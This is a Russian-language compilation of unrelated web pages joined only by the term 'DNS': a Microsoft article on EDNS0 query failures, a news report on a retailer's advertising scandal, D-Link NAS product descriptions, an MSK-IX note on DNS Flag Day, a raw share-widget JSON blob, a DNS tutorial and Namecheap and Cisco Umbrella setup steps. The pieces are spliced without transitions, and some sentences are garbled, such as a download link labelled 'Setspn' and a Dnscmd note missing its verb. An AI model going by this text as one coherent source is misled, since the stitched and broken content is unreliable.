Некоторые запросы DNS-имен неуспешны — Windows Server
- Чтение занимает 2 мин
В этой статье
В этой статье описывается проблема, из-за которой DNS-запросы к некоторым доменам могут быть не разрешены после развертывания DNS-сервера на основе Windows.
Исходная версия продукта: Windows Server 2012 R2
Исходный номер КБ: 832223
Симптомы
После развертывания DNS-сервера на базе Windows запросы DNS к некоторым доменам могут быть не разрешены успешно.
Причина
Эта проблема возникает из-за функций механизмов расширения для DNS (EDNS0), поддерживаемых в DNS Windows Server.
EDNS0 позволяет использовать более крупные размеры пакетов UDP.
Решение
Чтобы устранить эту проблему, обновите программу брандмауэра, чтобы распознавать и разрешать пакеты UDP, размером более 512байт. Для получения дополнительных сведений о том, как это сделать, обратитесь к производителю программы брандмауэра.
Контактные данные сторонних организаций предоставлены в этой статье с целью помочь пользователям получить необходимую техническую поддержку. Эти данные могут быть изменены без предварительного уведомления. Корпорация Майкрософт не дает гарантий относительно правильности приведенных контактных данных сторонних производителей.
Обходной путь
Чтобы обойти эту проблему, отключите функцию EDNS0 на DNS-серверах под windows. Для этого сделайте следующее:
В командной подсказке введите следующую команду и нажмите ввод:
dnscmd /config /enableednsprobes 0
Примечание
Введите 0 (ноль), а не букву «O» после «enableednsprobes» в этой команде.
Появится следующая информация:
Свойство реестра enableednsprobes успешно сбрасывается.
Команда успешно выполнена.
Примечание
Dnscmd.exe на всех DNS-серверах под управлением Windows, кроме серверов под управлением Windows Server 2003 или Windows Server 2003 R2. Вы можете установить Dnscmd.exe из средств поддержки Windows Server 2003. Чтобы скачать средства поддержки Windows Server 2003, щелкните следующую ссылку Центра загрузки Майкрософт: Setspn
Дополнительные сведения
Некоторые брандмауэры содержат функции для проверки определенных параметров пакета DNS. Эти функции брандмауэра могут убедиться, что отклик DNS меньше 512байт. Если вы захватываете сетевой трафик для неудачного DNS-запроса, вы можете заметить, что DNS запрашивает EDNS0. Кадры, похожие на следующие, не получают ответ:
Дополнительные записи
<Root>: type OPT, class unknown
Имя: <Root>
Тип: параметр EDNS0
Размер полезной нагрузки UDP: 1280
В этом сценарии брандмауэр может сбросить все расширенные кадры UDP EDNS0.
«Идиотизм маркетинга»: скандал вокруг ролика DNS к 23 февраля
Фото: YouTubeЗа несколько дней до праздника сеть магазинов цифровой техники из Владивостока DNS опубликовала на YouTube рекламный ролик, в котором мужчины вывозят связанных девушек в лес и заставляют их закапывать подаренные носки. Рекламу удалили в тот же день, но скандал до сих пор не утих: 23 февраля директор DNS Дмитрий Алексеев опубликовал второй по счету пост в Facebook, в котором изложил свою позицию.
По сюжету ролика мужчина увозит свою девушку в зимний лес в багажнике автомобиля, предварительно связав ее. Там он заставляет ее рыть в земле яму и закапывать носки — подарок на 23 февраля, который разозлил его. Неподалеку еще одна девушка, которую в лес также привез ее мужчина, закапывает пену для бритья и дезодорант. В конце ролика выясняется, что ничего этого не происходило в реальности: лес привиделся главной героине, пока она гуляла по торговому центру. Девушка выбрасывает купленные носки в ближайшую урну и отправляется за подарком в DNS. В конце ролика звучит фраза: «Мужские подарки без риска для жизни».
Спорную рекламу сразу же раскритиковали в твиттере и Facebook — на момент появления первых публикаций оригинальный ролик не набрал и 200 просмотров. Рекламу сразу же удалили, но пользователи стали сами перезаливать ее на YouTube. Авторов видео, а с ними и компанию DNS, обвинили в пропаганде насилия над женщинами и жестокости. Некоторые пользователи отмечали, что не видят в ролике ничего оскорбительного.
Пользователи Facebook начали занижать рейтинг страницы магазина: на момент написания заметки он равнялся 2,3. В комментариях к низким оценкам пользователи писали, что разочарованы в DNS, а некоторые пообещали не пользоваться услугами торговой сети.
В день публикации ролика директор DNS Дмитрий Алексеев опубликовал в Facebook пост с объяснениями. Он написал, что его компании «представился случай проиллюстрировать идиотизм маркетинга на собственном примере», и объяснил, что скандальная реклама была создана одним из региональных отделений.
дмитрий алексеев
директор DNS
«Это не хитрый маркетинговый ход компании ДНС, скорее пример маркетингового идиотизма.
В комментариях к посту Алексеева часть пользователей поддержала директора сети и посоветовала повысить авторов рекламы или выплатить им премию. Другие пользователи назвали извинения предпринимателя неубедительными и раскритиковали его за попытку переложить ответственность на подчиненных.
В результате 23 февраля Алексеев опубликовал еще один пост, посвященный скандалу. Предприниматель написал, что пользователи продолжают критиковать DNS за удаленную рекламу, и поэтому он считает нужным изложить свою позицию подробнее. Бизнесмен еще раз напомнил, что ролик был снят «энтузиастами из небольшого сибирского города», на YouTube-канал которых подписано не более тысячи человек.
Также Алексеев отметил, что является противником любого насилия. По словам предпринимателя, «до вчерашнего дня» он просто не знал о такой проблеме, как жестокость по отношению к женщинам и детям в российских семьях.
директор DNS
«Я категорический противник любого насилия! Против войн, насилия на улице, в школе, по отношению к животным. Каюсь, до вчерашнего дня я действительно не знал того пласта проблем, который связан с насилием в семье, по отношению к детям и женщинам. Я не смотрю ТВ, вырос и живу в семье, где подобное насилие немыслимо. В среде моих друзей и знакомых эта тема абсолютно не присутствует. Очень сожалею, что есть люди, которым пришлось через это пройти. И сожалею, что в России таких много.
Я считаю, что тут действительно есть за что извиняться, готов приносить свои извинения столько, сколько это потребуется. Как официальные, так и человеческие. Прошу прощения у всех, кому мы невольно принесли неприятные чувства, или вызвали неприятные воспоминания. Как только я увидел проблему, так извинился сразу, не дожидаясь волны хайпа».
Алексеев написал, что осознает ответственность за появление ролика и готов к последствиям, но «откупаться» от кого-то он не собирается. «Не будем суетливо организовывать никаких фондов и организаций. У меня и у моих коллег есть свои социальные проекты, которые мы и будем продолжать дальше», — объяснил он. Увольнять ответственных за создание рекламы Алексеев также отказался. «Будет суд — значит будет суд. Будет бойкот — значит будем доказывать клиентам, что мы достойны их внимания», — резюмировал он.
Подписывайтесь на наш канал в Telegram!
D-Link DNS-343
Рекомендованная замена — DNS-345 |
Безопасный совместный доступ к общим файлам
Сетевой дисковый массив DNS-343 с 4 отсеками для жестких дисков SATA предоставляет пользователям возможность совместного использования документов, файлов и цифрового фото-, видео- и музыкального контента. 4 отсека позволяют добавить до 4-х дисков SATA в зависимости от потребностей пользователя, что делает DNS-343 идеальным решением для офиса. Также возможен удаленный доступ к файлам через Интернет, благодаря встроенному FTP-серверу. При этом сотрудники компании, находясь за пределами офиса, могут получать доступ к файлам. При настройке DNS-343 можно задать различные привилегии доступа пользователям, группам пользователей и определенным папкам. Эти функции сетевой безопасности являются незаменимыми в офисной сети, позволяя сотрудникам доступ только к тем файлам, которые им необходимы непосредственно для выполнения работы.
Доступ к медиа-контенту через медиаплееры, поддерживающие UPnP AV
DNS-343 позволяет создать резервную копию медиафайлов. Благодаря встроенному медиасерверу UPnP AV, DNS-343 дает возможность передавать цифровой контент на совместимые медиаплееры (например, плееры серии MediaLounge D-Link). Кроме того, DNS-343 оснащен экраном OLED, отображающим в реальном времени используемый диск, статус сервера и другую информацию.
Защита, производительность и надежность
В DNS-343 доступны 5 различных режимов работы с жесткими дисками (Standard, JBOD, RAID 0, RAID 1 и RAID 5), позволяющих пользователям выбрать необходимую конфигурацию. В режиме Standard для использования доступны четыре отдельных жестких диска. Режим JBOD объединяет все диски в один. Режим RAID 0 обеспечивает высокую производительность за счет разделения записи и чтения между жесткими дисками. При использовании режима RAID 1 содержимое одного жесткого диска дублируется на другой, что обеспечивает максимальную надежность. Если один из жестких дисков выходит из строя, другой продолжает функционировать в полном объеме. При использовании режима RAID 5 данные распределяются на три и более диска, что обеспечивает эффективность и надежность хранения данных.
D-Link DNS-323
Рекомендованная замена — DNS-325/A1A |
Совместный доступ к цифровым файлам по локальной сети и через Интернет
Сетевой дисковый массив DNS-323 с 2 отсеками для жестких дисков SATA предоставляет пользователям возможность совместного использования документов, файлов, и цифровых медиафайлов в домашней или офисной сети. Благодаря встроенному FTP-серверу возможен удаленный доступ к файлам через Интернет. DNS-323 обеспечивает защиту данных, предоставляя доступ к файлам по локальной сети или через Интернет только определенным пользователям или группам пользователей с правом чтения или чтения/записи каталогов. DNS-323 является идеальным решением как для офисных сотрудников, работающих с конфиденциальными данными, так и для пользователей домашней сети.
Совместимость с медиаплеерами
Строго соответствуя стандарту Universal Plug-and-Play, DNS-323 может напрямую взаимодействовать с медиаплеерами, совместимыми с UPnP (представленными в продуктовой линейке D-Link MediaLounge). DNS-323 поддерживает возможность резервного копирования музыки, фотографий и видеоколлекций для надежного хранения информации и встроенный UPnP AV сервер, для воспроизведения потокового контента.
Защита, производительность и гибкость использования
В DNS-323 доступны 4 различных режима работы с жесткими дисками (Standard, JBOD, RAID 0, RAID 1), позволяющих пользователям выбрать необходимую конфигурацию. В режиме Standard для использования доступны два отдельных жестких диска. Режим JBOD объединяет оба диска в один. Режим RAID 0 обеспечивает высокую производительность за счет разделения записи и чтения между двумя жесткими дисками. При использовании режима RAID 1 содержимое одного жесткого диска дублируется на другой, что обеспечивает максимальную надежность. Если один из жестких дисков выходит из строя, второй продолжает функционировать в полном объеме.
Об инициативе DNS Flag Day :: База знаний MSK-IX
Рекомендации MSK-IX для администраторов DNS-серверов и DNS-резолверов и операторов связи
Резюме
DNS Flag Day https://dnsflagday.net – инициатива профессионального DNS-сообщества, направленная на ускорение и упрощение развертывания новых функций в глобальной системе DNS. Начиная с 1 февраля 2019 г. основные поставщики ПО DNS с открытым исходным кодом будут выпускать обновления своего ПО, реализующие более строгую обработку запросов с применением расширений протокола DNS (EDNS).
Речь идет о согласованном прекращении поддержки на DNS-резолверах «обходных механизмов», позволяющих работать с DNS-серверами, не поддерживающих ответы на запросы с EDNS. С этой целью разработчики распространенного ПО DNS-резолверов (BIND, PowerDNS, Knot, Unbound) договорились синхронизировать выпуск новых версий, в которых «обходные механизмы» отключены.
Поскольку выпуск новых версий ПО не означает одномоментных изменений в работе DNS-инфраструктуры, данная инициатива не должна привести к критическим изменениям в работе сети Интернет. Настоящая статья посвящены подходам к решению возможных локальных проблем, находящихся в компетенции операторов DNS-серверов, DNS-резолверов и операторов сетей связи.
Поддержка EDNS на авторитетных DNS-серверах не является обязательной. Организаторы акции обращают внимание, что в случае отсутствия такой поддержки требуется обеспечить только корректную работу авторитетного DNS-сервера в соответствии с действующими стандартами DNS, в частности, RFC 6891 (секция 7).
Для предотвращения возможных проблем корпорацией ISC была разработана серия тестов, которая проверяет работу расширений протокола DNS (EDNS) на авторитетных DNS-серверах тестируемого домена. Данные тесты доступны на сайте https://ednscomp.isc.org/ednscomp. Следует обратить внимание на то, что ряд распространенных механизмов защиты от DDoS с использованием DNS, например от атак типа DNS-amplification, противоречат выбранному способу проверки готовности DNS к переходу на EDNS. Поэтому интерпретация результатов тестов должна проводиться профессионалами. Корпорация ISC приводит пример неуспешного теста по тайм-ауту в случае, если на авторитетном DNS-сервере установлено ограничение по нагрузке по числу запросов от хоста, на котором выполняется тест (Response Rate Limiting).
Что такое EDNS?
EDNS – описанный стандартом RFC6891 набор расширений для оригинального протокола DNS, позволяющий дополнить его рядом полезных функций: увеличение размера ответа; передача списков опций, поддерживаемых сервером или клиентом-резолвером; поддержка DNSSEC и др. Также EDNS применяется для противодействия DDoS-атакам с использованием механизма DNS-cookie.
Как изменится поведение DNS-серверов в результате обновления ПО?
Изменения, связанные с обновлением ПО DNS-резолверов, коснутся только ситуаций, когда DNS-резолвер не получает от авторитетного DNS-сервера ответа на запрос, отправленный с использованием расширений EDNS. Такое возможно в следующих случаях:
1) Авторитетный DNS-сервер игнорирует EDNS-запросы. Это означает, что он настроен некорректно, так стандартами предусмотрено отправка ответа, например, сообщения об ошибке.
2) Запросы или ответы DNS фильтруются промежуточными узлами, например, межсетевыми экранами. Фильтрация пакетов, содержащих информацию DNS, может использоваться в составе мер противодействия DDoS-атакам. Фильтроваться могут либо запросы/ответы, превышающие определенную длину (типовые для UDP 512 байтов), либо запросы/ответы, содержащие дополнительные флаги. Применение фильтрации может привести к нарушению взаимодействия между корректно работающим DNS-резолвером и корректно работающим авторитетным DNS-сервером.
В настоящее время многие DNS-резолверы используют дополнительные «обходные механизмы», позволявшие преодолеть сбой и установить взаимодействие с некорректно настроенным или недоступным по EDNS авторитетным DNS-сервером. Эти механизмы сводятся к повтору DNS-запросов с другими сочетаниями параметров, в том числе, без EDNS. Применение выпущенных после 01.02.2019 обновлений ПО DNS-серверов, приведет к тому, что новые версии DNS-резолверов станут считать нерабочим авторитетный DNS-сервер, от которого не был получен ответ на запрос с EDNS, и перестанут к нему обращаться.
Такое изменение подразумевает, что каждый авторитетный DNS-сервер должен быть доступен для корректных DNS-запросов, использующих EDNS, и должен отвечать на такие запросы. Из этого не следует, что авторитетный DNS-сервер должен полностью поддерживать EDNS: если сервер отвечает корректным пакетом с кодом DNS-ошибки («Ошибка формата»), резолвер повторит запрос без EDNS. В частности, такое поведение заявлено для Unbound и BIND.
Таким образом, в новых версиях ПО после 01.02.2019 применяется строгая обработка отсутствия ответа – в таком случае DNS-резолвер не будет пытаться отправить запрос без EDNS.
Влияние на работу сети Интернет
Выпуск новых версий ПО DNS-серверов не приведет к критическим изменениям в работе сети Интернет. Инициатива DNS Flag Day ставит своей целью устранение отдельных сохранившихся несоответствий стандартам DNS, не являющихся массовой проблемой. Подавляющее большинство авторитетных DNS-серверов, в том числе серверы DNS-облака MSK-IX, обслуживающие домены верхнего уровня RU, РФ, SU, ДЕТИ, TATAR корректно поддерживают работу с расширениями EDNS. Администраторам DNS-серверов, некорректно обрабатывающим EDNS-запросы предстоит обновить ПО или изменить программный код.
Важную роль для корректной работы систем DNS играет корректная настройка сетевого транспорта и систем фильтрации трафика. Эти настройки имеют косвенное отношение к системе DNS, но могут повлиять ее работу. Теоретически оператор сетевого оборудования может настроить правила фильтрации таким образом, что запросы расширения EDNS будут блокироваться некорректно. В этом случае при обновлении ПО DNS-резолверов работа службы DNS может быть нарушена. На практике, подавляющее большинство сетей обеспечивают корректный двусторонний обмен DNS-трафиком с применением EDNS, так как нарушения такого обмена влияют на пользователей, и как правило, хорошо заметны.
Поэтому, для исключения возможных аварий, требуется участие провайдеров доступа, сетевых служб, обеспечивающих прохождение пакетов DNS «в обе стороны» – и на стороне клиентов (рекурсивных резолверов), и на стороне авторитетных серверов.
Такое участие состоит в проверке правил межсетевых экранов и подобного программно-аппаратного обеспечения: пакеты EDNS, при штатной работе сети, не должны блокироваться (если тотальное блокирование все же необходимо, то следует отправлять на адрес источника пакета сообщение DNS о неверном запросе).
Влияние на домены верхнего уровня RU, РФ, SU, ДЕТИ, TATAR
DNS-облако MSK-IX, реализующее функции авторитетных DNS-серверов для доменов верхнего уровня RU, РФ, SU, ДЕТИ, TATAR, использует современные версии программного обеспечения DNS и корректно обрабатывает запросы DNS-резолверов с использованием расширений EDNS. Системы регулярно проходят аудит ICANN на предмет соответствия международным стандартам и уровням обслуживания, установленным ICANN.
в новой рекламе DNS к 8 марта в лес вывозят мужчину, а не женщину — Маркетинг на vc.ru
{«id»:34372,»url»:»https:\/\/vc.ru\/marketing\/34372-video-v-novoy-reklame-dns-k-8-marta-v-les-vyvozyat-muzhchinu-a-ne-zhenshchinu»,»title»:»\u0412\u0438\u0434\u0435\u043e: \u0432 \u043d\u043e\u0432\u043e\u0439 \u0440\u0435\u043a\u043b\u0430\u043c\u0435 DNS \u043a 8 \u043c\u0430\u0440\u0442\u0430 \u0432 \u043b\u0435\u0441 \u0432\u044b\u0432\u043e\u0437\u044f\u0442 \u043c\u0443\u0436\u0447\u0438\u043d\u0443, \u0430 \u043d\u0435 \u0436\u0435\u043d\u0449\u0438\u043d\u0443″,»services»:{«facebook»:{«url»:»https:\/\/www. facebook.com\/sharer\/sharer.php?u=https:\/\/vc.ru\/marketing\/34372-video-v-novoy-reklame-dns-k-8-marta-v-les-vyvozyat-muzhchinu-a-ne-zhenshchinu»,»short_name»:»FB»,»title»:»Facebook»,»width»:600,»height»:450},»vkontakte»:{«url»:»https:\/\/vk.com\/share.php?url=https:\/\/vc.ru\/marketing\/34372-video-v-novoy-reklame-dns-k-8-marta-v-les-vyvozyat-muzhchinu-a-ne-zhenshchinu&title=\u0412\u0438\u0434\u0435\u043e: \u0432 \u043d\u043e\u0432\u043e\u0439 \u0440\u0435\u043a\u043b\u0430\u043c\u0435 DNS \u043a 8 \u043c\u0430\u0440\u0442\u0430 \u0432 \u043b\u0435\u0441 \u0432\u044b\u0432\u043e\u0437\u044f\u0442 \u043c\u0443\u0436\u0447\u0438\u043d\u0443, \u0430 \u043d\u0435 \u0436\u0435\u043d\u0449\u0438\u043d\u0443″,»short_name»:»VK»,»title»:»\u0412\u041a\u043e\u043d\u0442\u0430\u043a\u0442\u0435″,»width»:600,»height»:450},»twitter»:{«url»:»https:\/\/twitter.com\/intent\/tweet?url=https:\/\/vc.ru\/marketing\/34372-video-v-novoy-reklame-dns-k-8-marta-v-les-vyvozyat-muzhchinu-a-ne-zhenshchinu&text=\u0412\u0438\u0434\u0435\u043e: \u0432 \u043d\u043e\u0432\u043e\u0439 \u0440\u0435\u043a\u043b\u0430\u043c\u0435 DNS \u043a 8 \u043c\u0430\u0440\u0442\u0430 \u0432 \u043b\u0435\u0441 \u0432\u044b\u0432\u043e\u0437\u044f\u0442 \u043c\u0443\u0436\u0447\u0438\u043d\u0443, \u0430 \u043d\u0435 \u0436\u0435\u043d\u0449\u0438\u043d\u0443″,»short_name»:»TW»,»title»:»Twitter»,»width»:600,»height»:450},»telegram»:{«url»:»tg:\/\/msg_url?url=https:\/\/vc. ru\/marketing\/34372-video-v-novoy-reklame-dns-k-8-marta-v-les-vyvozyat-muzhchinu-a-ne-zhenshchinu&text=\u0412\u0438\u0434\u0435\u043e: \u0432 \u043d\u043e\u0432\u043e\u0439 \u0440\u0435\u043a\u043b\u0430\u043c\u0435 DNS \u043a 8 \u043c\u0430\u0440\u0442\u0430 \u0432 \u043b\u0435\u0441 \u0432\u044b\u0432\u043e\u0437\u044f\u0442 \u043c\u0443\u0436\u0447\u0438\u043d\u0443, \u0430 \u043d\u0435 \u0436\u0435\u043d\u0449\u0438\u043d\u0443″,»short_name»:»TG»,»title»:»Telegram»,»width»:600,»height»:450},»odnoklassniki»:{«url»:»http:\/\/connect.ok.ru\/dk?st.cmd=WidgetSharePreview&service=odnoklassniki&st.shareUrl=https:\/\/vc.ru\/marketing\/34372-video-v-novoy-reklame-dns-k-8-marta-v-les-vyvozyat-muzhchinu-a-ne-zhenshchinu»,»short_name»:»OK»,»title»:»\u041e\u0434\u043d\u043e\u043a\u043b\u0430\u0441\u0441\u043d\u0438\u043a\u0438″,»width»:600,»height»:450},»email»:{«url»:»mailto:?subject=\u0412\u0438\u0434\u0435\u043e: \u0432 \u043d\u043e\u0432\u043e\u0439 \u0440\u0435\u043a\u043b\u0430\u043c\u0435 DNS \u043a 8 \u043c\u0430\u0440\u0442\u0430 \u0432 \u043b\u0435\u0441 \u0432\u044b\u0432\u043e\u0437\u044f\u0442 \u043c\u0443\u0436\u0447\u0438\u043d\u0443, \u0430 \u043d\u0435 \u0436\u0435\u043d\u0449\u0438\u043d\u0443&body=https:\/\/vc. ru\/marketing\/34372-video-v-novoy-reklame-dns-k-8-marta-v-les-vyvozyat-muzhchinu-a-ne-zhenshchinu»,»short_name»:»Email»,»title»:»\u041e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u043d\u0430 \u043f\u043e\u0447\u0442\u0443″,»width»:600,»height»:450}},»isFavorited»:false}
13 231 просмотров
Основы работы со службой DNS (domain name system)
Общая информация
В этой статье рассмотрены необходимые для практического применения базовые аспекты функционирования DNS.
DNS (Domain Name System — система доменных имен) представляет собой распределенную систему хранения и обработки информации о доменных зонах. Она необходима, в первую очередь, для соотнесения IP-адресов устройств в сети и более адаптированных для человеческого восприятия символьных имен. Предоставление информации об IP-адресах хостов по символьному адресу — не единственная задача DNS. Система работает с разными типами ресурсных записей, позволяющими реализовывать весьма широкий круг задач: переадресация между доменными именами, балансировка нагрузки между хостами, привязка специфических сервисов (напр. , эл. почты) к домену.
Система доменных имен является одной из фундаментальных технологий современной интернет-среды, так как информация об IP-адресе запрашиваемого узла — обязательное условие получения ответа на любой интернет-запрос. Но IP-адрес представляет собой числовое значение вида «1.23.45.67», неподходящее для комфортного восприятия человеком. К тому же основной принцип распределения IP-адресов в сети — уникальность. Важно и то, что сетевой адрес — не самый устойчивый параметр. Он может изменяться (напр., при смене хоста, обслуживающего запрашиваемый узел, смене хостинг-провайдера, и т.п.). Все перечисленные особенности делают систему навигации по сетевым адресам сложной для человека.
DNS обеспечивает преобразование запрашиваемого клиентом символьного имени домена в IP-адрес (адреса) обслуживающего эту доменную зону сервера (серверов). Изначально, до разрастания сети интернет, адреса преобразовывались согласно содержимому файла «hosts», составлявшегося централизованно и автоматически рассылавшегося на каждую из машин в сети. По мере роста глобальной сети такой метод перестал оправдывать себя — появилась потребность в новом механизме, которым и стала DNS, разработанная в 1983 году Полом Мокапетрисом.
Ключевыми характеристиками DNS являются:
- Распределенность хранения и управления — каждый DNS-сервер обязан хранить информацию только по делегированным ему доменам, а ответственность за различные узлы дерева доменных имен несут разные лица
- Кэширование данных — DNS-сервер может временно хранить некоторое количество информации о неделегированных ему доменах для уменьшения уровня общей нагрузки
- Иерархическая структура — узел, ответственный за доменную зону, может самостоятельно делегировать нижестоящие узлы другим DNS-серверам
- Резервирование — хранение и обработка информации об одних и тех же узлах обычно обеспечивается несколькими DNS-серверами, изолированными физически и логически. Такой подход обеспечивает доступность информации даже при сбое одного или нескольких узлов.
Иерархия и делегирование доменных имен
Домен представляет собой именованную ветвь в дереве имен, включающую в себя сам узел (напр., домен первого уровня «.com»), а также подчиненные ему узлы (напр., домен второго уровня «example.com», домен третьего уровня «mail.example.com» и т.д.). Для обозначения иерархической принадлежности доменных имен принято использовать понятие «уровень» — показатель положения узла в дереве доменов. Чем ниже значение уровня, тем выше иерархическое положение домена
- «.» — домен нулевого уровня
- «.ru» — домен первого (верхнего) уровня
- «example.com» — домен второго уровня
- «mail.example.com» — домен третьего уровня
- Этот список можно продолжать
Обратите внимание на домен нулевого уровня «. » (dot — точка), также называемый корневым. На практике точку обычно не указывают («example.com» вместо «example.com.»), т.е. указание корневого домена не является обязательным условиям разрешения IP-адреса. Большинство клиентских программ (интернет-браузеров и т.д.) добавляют домен нулевого уровня автоматически и не отображают его пользователю. Доменное имя, не включающее обозначение домена нулевого уровня называется относительным, включающее же точку на конце — полностью определенным (FQDN — Fully Qualified Domain Name).
Доменная зона — часть иерархического дерева доменных имен (напр. «.ru»), целиком переданная на обслуживание определенному DNS-серверу (чаще нескольким) с целью делегирования другому лицу ответственности за этот и все подчиненные домены («anyaddress.ru», «any.anyaddress.ru»).
Делегирование — передача ответственности за определенную ветвь дерева доменных имен другому физическому или юридическому лицу. Именно эта процедура практически реализует важный принцип работы DNS — распределенность хранения записей и обработки запросов. Сам процесс делегирования представляет собой добавление в ресурсные записи родительской зоны («.ru»), так называемых «склеивающих» («glue») NS-записей для делегируемой дочерней зоны («example.com»), указывающих на DNS-сервера принимающей домен стороны (например, DNS-сервера нашей компании). С этого момента все ресурсные записи домена второго уровня «example.com» и всех его дочерних доменов (например, «mail.example.com» и т.д.) хранятся на DNS-серверах этой компании, а родительская зона «.ru» хранит только указывающие на эти сервера NS-записи.
DNS-сервер — хост, хранящий ресурсные записи и обрабатывающий DNS-запросы. DNS-сервер может самостоятельно разрешать адреса, относящиеся к зоне его ответственности (в примере выше это зона example.com), или передавать запросы по зонам, которые он не обслуживает, вышестоящим серверам.
DNS-клиент — набор программных средств для работы с DNS. Сам DNS-сервер периодически также выступает в качестве клиента.
Основные типы ресурсных записей
Ресурсная запись (RR — Resource Record) — единица хранения и передачи информации в DNS, включающая в себя следующие элементы (поля):
- Имя (Name) — имя домена, к которому относится запись
- TTL (Time To Live) — допустимое время хранения записи неответственным сервером
- Тип (Type) — параметр, определяющий назначение и формат записи в поле данных (Rdata)
- Класс (Class) — тип сети передачи данных (подразумевается возможность DNS работать с типами сетей, отличных от TCP/IP)
- Длина поля данных (Rdlen)
- Поле данных (Rdata) — содержание и формат поля зависят от типа записи
Ниже представлены типы ресурсных записей, используемые чаще всего:
- A (IPv4 Address Record — адресная запись) — связывает доменное имя с IPv4-адресом хоста
- AAAA (IPv6 Address Record) — связывает доменное имя с IPv6-адресом хоста (аналогично А-записи)
- CNAME (Canonical Name Record — каноническая запись имени) — используется для перенаправления на другое доменное имя
- MX (Mail Exchange — почтовый обменник) — ссылается на почтовый сервер, обслуживающий домен
- NS (Name Server — сервер имен) — ссылается на DNS-сервер, ответственный за домен
- TXT — текстовое описание домена. Зачастую требуется для выполнения специфических задач (например, подтверждения права собственности на домен при привязке его к почтовому сервису)
- PTR (Point to Reverse — запись указателя) — связывает ip-адрес машины с доменом, используется преимущественно для проверки сторонними почтовыми сервисами отправляемых через эту машину электронных писем на отношение к домену, указанному в параметрах почтового сервера. При несоответствии этих параметров письмо проверяется более тщательно по другим критериям.
Рекурсивные и нерекурсивные DNS-запросы
Рекурсией называется модель обработки запросов DNS-сервером, при которой последний осуществляет полный поиск информации, в том числе о доменах, неделегированных ему, при необходимости обращаясь к другим DNS-серверам.
DNS-запросы (DNS queries) от клиента (сервера) к серверу бывают рекурсивными и нерекурсивными. В первом случае DNS-сервер, принявший запрос, опрашивает все узлы в порядке убывания уровня зон, пока не получит положительный ответ или информацию о том, что запрашиваемый домен не существует. В случае с нерекурсивными запросами сервер даст положительный ответ только при запросе узла, входящего в доменную зону, за которую этот сервер ответственен. Отсутствие рекурсии может быть обусловлено не только типом запроса, но и запретом на выполнение таких запросов со стороны самого DNS-сервера.
Кэширование — еще одна важная характеристика DNS. При последовательном обращении сервера к другим узлам в процессе выполнения рекурсивного запроса DNS-сервер может временно сохранять в кеш-памяти информацию, содержащуюся в получаемых им ответах. В таком случае повторный запрос домена не идет дальше его кэш-памяти. Предельно допустимое время кэширования содержится в поле TTL ресурсной записи.
P. S. Другие инструкции:
Спасибо за Вашу оценку! К сожалению, проголосовать не получилось. Попробуйте позже
Как изменить DNS для домена — Домены
Чтобы изменить серверы имен для вашего домена, вам необходимо сделать следующее:
1. Войдите в свою учетную запись Namecheap .
2. Выберите Domain List на левой боковой панели и нажмите кнопку Manage рядом с вашим доменом:
3. Найдите раздел Nameservers и выберите нужный вариант в раскрывающемся меню. Щелкните зеленую галочку , чтобы сохранить изменения:
ПРИМЕЧАНИЕ : Серверы имен являются частью обширной базы данных, называемой системой доменных имен (DNS), которая действует как каталог для устройств и прикрепленных к ним IP-адресов. .Во время регистрации серверов имён имён присваивается IP-адрес. Незарегистрированные серверы имен не имеют связанного IP-адреса и не могут правильно работать с некоторыми доменами. Например, Реестр доменов .net проверяет, зарегистрированы ли серверы имен и не разрешает ли использование незарегистрированных серверов имен.
Вы можете выбрать один из четырех возможных вариантов:
- Namecheap BasicDNS — если вы хотите привязать свой домен к нашим серверам имен по умолчанию:
dns2.registrar-servers.com
- Namecheap Web Hosting DNS — если у вас есть общий план хостинга с нами и вы хотите направить свой домен на наши серверы имен хостинга:
dns2.namecheaphosting.com ПРИМЕЧАНИЕ: 1. После смены серверов имен все пользовательские записи DNS для вашего доменного имени будут заменены на записи нашего хостинга.Вы сможете воссоздать их в редакторе зоны cPanel и в меню маршрутизации электронной почты, где вы можете управлять настройками электронной почты домена.
2. * Не * выбирайте Namecheap Web Hosting DNS или введите dns1.namecheaphosting.com/dns2.namecheaphosting.com серверов имен, если у вас нет плана общего хостинга.
- Custom DNS — если вы хотите указать свой домен на настраиваемые серверы имен (например, ваши личные DNS-серверы или сторонние серверы имен хостинга, если ваш домен размещен у другого поставщика DNS) . Вам нужно будет заполнить ваши серверы имен хостинга пустыми строками и нажать на зеленую галочку , чтобы сохранить изменения:
* ns1-2.nameserver.com используется в качестве примера . Используйте серверы имен, предоставленные вашим хостинг-провайдером / DNS-провайдером.
ПРИМЕЧАНИЕ: Необходимо вводить серверы имен в формате ns1.example.tld , если вместо этого вы вводите IP-адреса, система не примет это. Таким образом, если вам были предоставлены и серверы имен, и IP-адрес (а), только серверы имен должны быть вставлены в качестве настраиваемых серверов имен.
- Namecheap PremiumDNS — это платная служба DNS, которую можно использовать с любым доменом, зарегистрированным у любого регистратора. Эта опция будет доступна для доменов, к которым прикреплена подписка PremiumDNS.
ПРИМЕЧАНИЕ : Если вы измените серверы имен с пользовательских серверов имен на наши серверы по умолчанию или наоборот, записи хоста не будут добавлены к новым серверам имен автоматически. Убедитесь, что сохранил все необходимые настройки и установил их вручную после переключения серверов имен.
Изменения серверов имен не распространяются мгновенно. После смены серверов имен местным интернет-провайдерам может потребоваться до 24 часов (в редких случаях и больше), чтобы обновить свои кеши DNS, чтобы все могли видеть ваш веб-сайт.
Вы всегда можете проверить свое доменное имя с помощью любого прокси-сервера, так как прокси-серверы не хранят кеш, поэтому вы можете видеть некэшированную информацию.
Вот и все!
Если у вас есть вопросы, обращайтесь в нашу службу поддержки.
Направьте свой DNS на Cisco Umbrella
Настройка DNS направляет трафик из вашей сети в глобальную сеть Cisco Umbrella. Когда запрос на разрешение имени хоста в Интернете поступает из сети, указанной на наши адреса DNS, Umbrella применяет настройки безопасности в соответствии с вашей политикой.
Чтобы использовать Umbrella, вам необходимо явно указать в настройках DNS в вашей операционной системе или аппаратном брандмауэре / маршрутизаторе IP-адреса серверов имен Umbrella и отключить автоматические DNS-серверы, предоставляемые вашим интернет-провайдером. Umbrella поддерживает адреса IPv4 и IPv6.
IPv4-адреса Umbrella:
- 208.67.222.222
- 208.67.220.220
IPv6-адреса Umbrella:
- 2620: 119: 35 :: 35
- 2620: 119: 53 :: 53
Некоторые системы позволяют указать несколько DNS-серверов. Мы рекомендуем использовать только серверы Cisco Umbrella и не включать другие DNS-серверы.
Это IP-адреса Anycast для Umbrella:
